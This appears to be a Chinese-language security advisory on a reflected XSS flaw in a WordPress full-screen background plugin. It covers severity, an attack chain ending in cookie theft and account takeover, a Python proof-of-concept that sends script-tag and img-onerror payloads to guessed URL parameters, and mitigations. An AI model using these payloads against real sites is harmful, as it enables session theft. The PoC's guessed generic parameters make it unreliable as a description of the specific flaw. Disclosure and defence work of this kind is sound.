CVE-2025-47666 WordPress Image&Video FullScreen Background插件反射型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-47666

漏洞类型

反射型跨站脚本(XSS)

CVSS评分

7.1 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

WordPress Image&Video FullScreen Background (lbg_fullscreen_fullwidth_slider)

漏洞概述

CVE-2025-47666是WordPress平台上一款名为Image&Video FullScreen Background的插件中存在的安全漏洞。该插件主要用于在WordPress网站中创建全屏背景图片和视频轮播功能，广泛应用于企业网站、作品集展示等场景。漏洞类型为反射型跨站脚本（Reflected XSS），漏洞成因是插件在处理用户输入时未能正确对特殊字符进行HTML转义或编码，导致攻击者可以通过构造恶意链接将恶意JavaScript代码注入到网页中。当受害者点击攻击者精心设计的恶意链接时，浏览器会执行嵌入的恶意脚本，从而窃取用户的会话Cookie、劫持用户账号、进行钓鱼攻击或植入恶意软件。由于该插件在WordPress生态中拥有一定数量的安装量此次漏洞可能影响大量网站。特别是在当前网络安全形势日趋严峻的环境下，反射型XSS虽然需要用户交互才能触发，但结合社会工程学攻击手段，成功率仍然较高。建议所有使用该插件的网站管理员立即采取修复措施。

技术细节

该漏洞存在于WordPress Image&Video FullScreen Background插件的输入处理机制中。攻击者通过在URL参数中注入恶意JavaScript代码，由于插件在获取URL参数后未对其进行充分的输入验证和输出编码，直接将用户可控的数据回显到网页HTML中，浏览器会将这些未转义的数据作为JavaScript代码执行。攻击者可以利用此漏洞窃取受害者的认证令牌、会话ID或其他敏感信息。具体利用方式为：攻击者构造包含恶意脚本的URL链接，如在参数值中使用<script>标签或事件处理器（如onerror、onload等）来执行JavaScript代码。当受害者访问该恶意链接时，浏览器解析服务器返回的HTML页面，执行注入的恶意脚本。反射型XSS的特点是恶意代码不存储在服务器端，而是通过URL参数反射到响应页面中，因此也被称为非持久性XSS。此类漏洞的修复需要在输出点对所有用户输入进行HTML实体编码，将特殊字符如<、>、"、'、&等转换为对应的HTML实体，确保浏览器将其作为数据而非代码处理。

攻击链分析

STEP 1

1

信息收集：攻击者首先识别目标网站是否使用WordPress CMS，并确定是否安装了Image&Video FullScreen Background插件（lbg_fullscreen_fullwidth_slider）

STEP 2

2

构造恶意链接：攻击者利用插件中存在的反射型XSS漏洞，在URL参数中注入恶意JavaScript代码，如<script>alert(document.cookie)</script>

STEP 3

3

社工传播：攻击者通过电子邮件、社交媒体、即时通讯工具或其他渠道向目标用户发送包含恶意链接的消息，诱导用户点击

STEP 4

4

触发漏洞：当受害者点击恶意链接访问目标网站时，浏览器发送请求到服务器，服务器将URL参数中的恶意代码未经转义地反射回HTML页面

STEP 5

5

代码执行：浏览器解析HTML响应时，遇到未转义的<script>标签，执行其中的JavaScript代码

STEP 6

6

窃取敏感信息：恶意脚本执行后，可以窃取受害者的Cookie、会话令牌、键盘输入记录等敏感信息，并发送给攻击者控制的服务器

STEP 7

7

账户劫持：攻击者利用窃取的会话信息冒充受害者登录网站，执行未授权操作或进一步渗透

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
from urllib.parse import quote

# CVE-2025-47666 PoC - Reflected XSS in WordPress lbg_fullscreen_fullwidth_slider plugin
# Target: WordPress site with Image&Video FullScreen Background plugin <= 1.6.7

def generate_xss_payload():
    """Generate XSS payload for the vulnerable parameter"""
    # Basic XSS payload
    payload = '<script>alert(document.cookie)</script>'
    # Alternative payload using img onerror
    alt_payload = '<img src=x onerror=alert(String.fromCharCode(67,86,69,45,50,48,50,53,45,52,55,54,54,54))>'
    return payload, alt_payload

def test_reflected_xss(target_url):
    """
    Test for reflected XSS vulnerability
    target_url: Base URL of the vulnerable WordPress site
    """
    payloads = generate_xss_payload()
    
    # Common vulnerable parameter patterns
    params_to_test = [
        '?search=',
        '?s=',
        '?query=',
        '?id=',
        '?page=',
        '?callback=',
        '?url=',
    ]
    
    results = []
    for param in params_to_test:
        for payload in payloads:
            test_url = target_url + param + quote(payload)
            try:
                response = requests.get(test_url, timeout=10)
                # Check if payload is reflected without encoding
                if payload in response.text and '<script>' in payload:
                    results.append({
                        'url': test_url,
                        'status': 'Vulnerable',
                        'payload': payload,
                        'parameter': param.strip('?=')
                    })
            except requests.RequestException as e:
                print(f'Error testing {test_url}: {e}')
    
    return results

# Example usage
# target = 'http://example.com/wp-admin/admin.php?page=lbg_fullscreen'
# results = test_reflected_xss(target)
# for r in results:
#     print(f"Vulnerable URL: {r['url']}")

影响范围

Image&Video FullScreen Background (lbg_fullscreen_fullwidth_slider) <= 1.6.7

防御指南

临时缓解措施

在官方补丁发布之前，可采取以下临时缓解措施：1）使用Web应用防火墙（WAF）规则阻止包含常见XSS payload的请求；2）禁用或替换该插件，使用替代的全屏背景解决方案；3）在WordPress主题或Nginx/Apache配置中添加CSP响应头限制脚本执行；4）使用ModSecurity等WAF工具设置自定义规则过滤恶意参数；5）加强管理员和用户的安全意识培训，警惕来历不明的链接；6）定期检查网站访问日志，排查异常请求模式；7）考虑使用云端WAF服务提供实时防护。